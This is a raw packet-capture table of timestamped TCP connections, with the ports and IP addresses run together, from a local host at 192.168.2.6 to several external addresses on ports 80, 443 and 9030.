            Jan 10, 2024 15:39:42.094613075 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:39:42.586160898 CET497419030192.168.2.6213.32.71.116
            Jan 10, 2024 15:39:44.515290976 CET497449030192.168.2.651.15.42.19
            Jan 10, 2024 15:39:44.907164097 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:39:45.557697058 CET497449030192.168.2.651.15.42.19
            Jan 10, 2024 15:39:46.470009089 CET49735443192.168.2.6207.244.78.230
            Jan 10, 2024 15:39:46.470083952 CET44349735207.244.78.230192.168.2.6
            Jan 10, 2024 15:39:46.470523119 CET44349735207.244.78.230192.168.2.6
            Jan 10, 2024 15:39:46.470601082 CET44349735207.244.78.230192.168.2.6
            Jan 10, 2024 15:39:46.470670938 CET49735443192.168.2.6207.244.78.230
            Jan 10, 2024 15:39:46.579404116 CET49736443192.168.2.666.175.235.244
            Jan 10, 2024 15:39:46.579433918 CET4434973666.175.235.244192.168.2.6
            Jan 10, 2024 15:39:46.579773903 CET49736443192.168.2.666.175.235.244
            Jan 10, 2024 15:39:46.579848051 CET4434973666.175.235.244192.168.2.6
            Jan 10, 2024 15:39:46.579927921 CET49736443192.168.2.666.175.235.244
            Jan 10, 2024 15:39:46.579931021 CET4434973666.175.235.244192.168.2.6
            Jan 10, 2024 15:39:46.579976082 CET49736443192.168.2.666.175.235.244
            Jan 10, 2024 15:39:46.626626015 CET49735443192.168.2.6207.244.78.230
            Jan 10, 2024 15:39:47.594543934 CET497449030192.168.2.651.15.42.19
            Jan 10, 2024 15:39:50.204034090 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:39:51.594629049 CET497449030192.168.2.651.15.42.19
            Jan 10, 2024 15:39:59.703903913 CET497449030192.168.2.651.15.42.19
            Jan 10, 2024 15:40:00.907247066 CET4971980192.168.2.6185.215.113.93
            Jan 10, 2024 15:40:05.707039118 CET4974580192.168.2.6154.35.175.225
            Jan 10, 2024 15:40:06.907083035 CET4974580192.168.2.6154.35.175.225
            Jan 10, 2024 15:40:08.907151937 CET4974580192.168.2.6154.35.175.225
            Jan 10, 2024 15:40:12.907041073 CET4974580192.168.2.6154.35.175.225
            Jan 10, 2024 15:40:21.000750065 CET4974580192.168.2.6154.35.175.225
            Jan 10, 2024 15:40:27.004309893 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.211648941 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.211757898 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.212155104 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.422620058 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.422684908 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.422724009 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.422763109 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.422758102 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.422801018 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.422812939 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.422812939 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.422841072 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.422849894 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.422879934 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.422887087 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.422949076 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.423007011 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.423046112 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.423057079 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.423089027 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.423186064 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.423234940 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.423353910 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.423398018 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629062891 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629184008 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629210949 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629228115 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629251957 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629270077 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629270077 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629309893 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629311085 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629349947 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629353046 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629389048 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629395962 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629430056 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629430056 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629475117 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629561901 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629601955 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629602909 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629641056 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629643917 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629679918 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.629717112 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.629755020 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.630413055 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.630450010 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.630470037 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.630490065 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.630492926 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.630527973 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.630534887 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.630568027 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.631823063 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.631879091 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.631948948 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.632019997 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.632028103 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.632082939 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.632087946 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.632199049 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.835702896 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.835774899 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.835823059 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.836558104 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.836627007 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.836668968 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.836694956 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.836694956 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.836694956 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.836709023 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.836713076 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.836749077 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.836754084 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.836786985 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.836791039 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.836823940 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.836828947 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.836868048 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.837107897 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.837145090 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.837153912 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.837182999 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.837193966 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.837224960 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.837255001 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.837299109 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.837377071 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.837414980 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.837421894 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.837460995 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.839426041 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.839504004 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.839509964 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.839540958 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.839545012 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.839580059 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.839585066 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.839622974 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.839653969 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.839692116 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.839699984 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.839736938 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.840379000 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.840419054 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.840428114 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.840456963 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.840461016 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.840502024 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.840528011 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.840564966 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.840569019 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.840606928 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.840609074 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.840650082 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.841289997 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.841327906 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.841363907 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.841399908 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.841404915 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.841404915 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.841438055 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.841439009 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.841439009 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.841476917 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:27.841480970 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:27.841520071 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.043078899 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.045636892 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.056466103 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.056653976 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.056754112 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.056791067 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.056813002 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.056869030 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.056883097 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.056921005 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.056963921 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.056998014 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.057041883 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.058310986 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.058351040 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.058399916 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.058409929 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.058444023 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.058502913 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.058547974 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.058877945 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.058931112 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.059026003 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.059077024 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.071105003 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.071145058 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.071223021 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.071377993 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.071378946 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.071425915 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.071463108 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.071643114 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.071717024 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.071717024 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.075216055 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.075252056 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.075287104 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.075429916 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.075467110 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.075463057 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.075464010 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.075501919 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.075546026 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.075546026 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.080107927 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.080154896 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.080303907 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.080338955 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.080369949 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.080375910 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.080369949 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.080411911 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.080437899 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.080437899 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.080461025 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081370115 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081407070 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081444025 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081480980 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081561089 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081579924 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081579924 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081579924 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081581116 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081600904 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081639051 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081655979 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081655979 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081676006 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081681967 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081712961 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081728935 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081748962 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081753016 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081784964 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081800938 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081820965 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081845045 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081859112 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.081865072 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.081909895 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.083906889 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.083945036 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.083981037 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.083983898 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.084006071 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.084017992 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084053040 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084068060 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.084069967 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084091902 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.084114075 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.084784031 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084800959 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084816933 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084861040 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.084868908 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084881067 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.084887981 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084919930 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084932089 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.084955931 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.084964037 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.084995985 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.085007906 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.085032940 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.085038900 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.085072041 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.085082054 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.085114002 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.085118055 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.085135937 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.085172892 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.085172892 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.094654083 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.252270937 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.252589941 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.252749920 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.252749920 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.262833118 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.262854099 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.262868881 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.262912035 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.262938023 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.262947083 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.262983084 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.263016939 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.263037920 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.263087034 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.263122082 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.263144970 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.263183117 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.263195038 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.263274908 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.263308048 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.263360023 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.263447046 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.263479948 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.264359951 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264410019 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264410973 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.264470100 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264487028 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264506102 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.264523983 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.264555931 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264643908 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264676094 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.264776945 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264847994 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264885902 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.264915943 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264947891 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.264954090 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.265038967 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.265078068 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.265088081 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.265609980 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.277609110 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.277652025 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.277719021 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.277755022 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.277765036 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.277791977 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.277806044 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.277827978 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.277868032 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.277960062 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.278012037 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.278072119 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.278235912 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.278290033 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.278322935 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.278361082 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.278394938 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.278462887 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.278501987 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.281409025 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.281621933 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.281629086 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.281666994 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.281702042 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.281704903 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.281740904 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.281776905 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.281781912 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.281810999 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.281815052 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.281850100 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.281884909 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.281908035 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.281981945 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.282021046 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.282083035 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.282119036 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.282119989 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.282155991 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.286576033 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.286617994 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.286653996 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.286678076 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.286689043 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.286705971 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.286726952 CET497469030192.168.2.6193.11.164.243
            Jan 10, 2024 15:40:28.286727905 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.286763906 CET903049746193.11.164.243192.168.2.6
            Jan 10, 2024 15:40:28.286799908 CET497469030192.168.2.6193.11.164.243
